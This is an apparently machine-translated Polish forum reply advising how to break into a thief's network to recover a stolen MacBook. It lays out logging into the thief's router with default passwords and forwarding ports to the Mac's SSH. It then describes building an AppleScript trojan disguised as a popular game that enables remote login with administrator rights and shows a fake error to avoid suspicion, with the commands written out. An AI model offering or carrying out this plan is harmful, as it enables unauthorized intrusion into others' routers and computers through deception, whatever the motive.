Pamiętam, jak oglądałem ten film Dr. Zoza. Dobry towar.
Wygląda na to, że znasz się na skryptach powłoki i potrzebujesz tylko wektora ataku. Kluczem do zrobienia czegoś podobnego do tego, co zrobił Zoz, jest uzyskanie dostępu do SSH. W przeciwieństwie do jego sytuacji, w której złodziej korzystał z modemu telefonicznego, jest prawie pewne, ponieważ nowsze komputery Mac nie wykonują połączenia telefonicznego, że złodziej korzysta z połączenia szerokopasmowego i stoi za jakimś routerem NAT.
Nawet jeśli SSH były włączone na komputerze, przekierowanie portów musiałoby być skonfigurowane na routerze, aby uzyskać dostęp do portu nasłuchiwania SSH urządzenia z zewnątrz. Zaletą połączenia szerokopasmowego jest to, że adres IP prawie na pewno zmienia się rzadziej niż w przypadku połączenia modemowego.
Gdybym był na twoim miejscu, trzymając IP złodzieja, najpierw spróbowałbym zalogować się do interfejsu internetowego ich routera i zobaczyć, co mogę z tego zrobić. To zadziwiające, jak wiele osób pozostawia swoje domyślne hasła routera / modemu na miejscu, a online są listy, w których można znaleźć domyślne hasła dla większości głównych producentów.
W środku sprawdź listę klientów DHCP na routerze i sprawdź, czy możesz znaleźć MacBooka. Wiele routerów wyświetla adres MAC (sprzętowy), przypisany wewnętrzny adres IP (najczęściej 192.168.1.x) i, co najważniejsze, nazwę komputera.
Sprawdź, który adres IP jest przypisany do MacBooka, a następnie skonfiguruj port do niego w ustawieniach routera. Użyj zewnętrznego portu innego niż 22 (na przykład port 2222) i przekaż go do portu 22 adresu IP komputera MacBook.
Wiele routerów ma włączony dostęp SSH, więc dostęp do IP @ portu 22 złodzieja może doprowadzić cię do powłoki routera zamiast do powłoki maszyny. Teraz powinieneś mieć port na zewnętrznym adresie IP złodzieja (który dostałeś od Dropbox), który zabierze cię bezpośrednio do portu SSH, z którym powinieneś być związany na MacBooku. Tyle że SSH nie jest jeszcze włączony.
Ta część wymaga pewnego działania od złodzieja. Podoba mi się pomysł na e-mail, ale wymaga, aby Twój znajomy korzystał z Apple Mail. Lepszym rozwiązaniem może być przesłanie kuszącego pliku .app do Dropbox, który włączy SSH (logowanie zdalne).
Możesz to zrobić za pomocą skryptu powłoki, ale robiąc to za pomocą Applescript, zapisując Applescript jako .app i nadając mu ładną ikonę, wszystko to znacznie przyczyni się do oszukiwania twojego znaku i nie zdradzenia się.
Oto kod Applescript, aby włączyć zdalne logowanie:
do shell script "sudo systemsetup setremotelogin on" user name "Friend's Username" password "Friend's Password" with administrator privileges
Ten fragment kodu zwróci ciąg z numerem seryjnym urządzenia, który możesz wysłać do siebie e-mailem, jeśli chcesz to zrobić:
do shell script "sudo system_profiler |grep \"r (system)\"" user name "Friend's Username" password "Friend's Password" with administrator privileges
Napisałbym jabłkowy skrypt, aby włączał zdalne logowanie i robi wszystko, czego potrzebujesz. Staraj się nie pisać skryptów w GUI ani aplikacjach innych niż powłoka, ponieważ wzbudzi to podejrzenia. Na końcu wyświetli się komunikat „Ta aplikacja nie może działać na tym komputerze Macintosh”. z przyciskiem „Wyjdź”, aby zmniejszyć podejrzenia. Gdy skrypt działa w edytorze AppleScript, zapisz go jako plik .app przeznaczony tylko do uruchamiania.
Spróbuj ukryć .app jako popularną grę, Plants vs. Zombies lub Angry Birds lub coś w tym rodzaju. Możesz wyeksportować ikonę z .app prawdziwej gry i umieścić ją w .app, który eksportujesz z Applescript. Jeśli twój przyjaciel dobrze przyjrzał się złodziejowi, możesz profilować go społecznie i ukryć .app jako coś innego, czym mogą być zainteresowani.
Pod warunkiem, że możesz skonfigurować port do przekazywania dalej (twój znak nie wymusza stosowania odpowiednich praktyk bezpieczeństwa) i możesz zmusić go do uruchomienia aplikacji, będziesz mieć pełny dostęp SSH do maszyny i będziesz mógł dalej szukać wskazówek bez natychmiast ujawniając swoją obecność. Wymaga to również, aby znak nie zmęczył się powiadomieniami Dropbox's Growl i zrezygnował z niego, więc radziłbym twojej przyjaciółce, aby na jakiś czas przestała zapisywać pliki w swoim Dropbox.
Uwaga: jeśli złodziej rozłączy się z usługodawcą internetowym i połączy się ponownie, otrzyma nowy zewnętrzny adres IP. Dodaj plik do Dropbox i poczekaj, aż się zsynchronizuje. Powinno to uzyskać zaktualizowany adres IP.
Uwaga 2: Jeśli użytkownik nie połączy się z routerem za pomocą MacBooka przez określony czas (zwykle 24 godziny), dzierżawa DHCP dla wewnętrznego adresu IP przypisanego do MacBooka wygasa. Najprawdopodobniej przy następnym połączeniu uzyska ten sam adres IP, chyba że do sieci zostanie wprowadzone inne urządzenie. W takim przypadku musisz ręcznie zalogować się ponownie do routera i zmodyfikować przekierowanie portu.
Nie jest to jedyny sposób ataku, ale to właśnie zrobiłbym, gdy zdałem sobie sprawę, że adres IP jest wciąż aktualizowany za pośrednictwem Dropbox. Powodzenia!
EDYCJA: „Uprawnienia administratora” na końcu każdego wiersza „do script script” są bardzo ważne. Użytkownik zostanie poproszony o podanie hasła administratora znajomego, a skrypt nie powiedzie się, jeśli nie podasz nazwy użytkownika i hasła.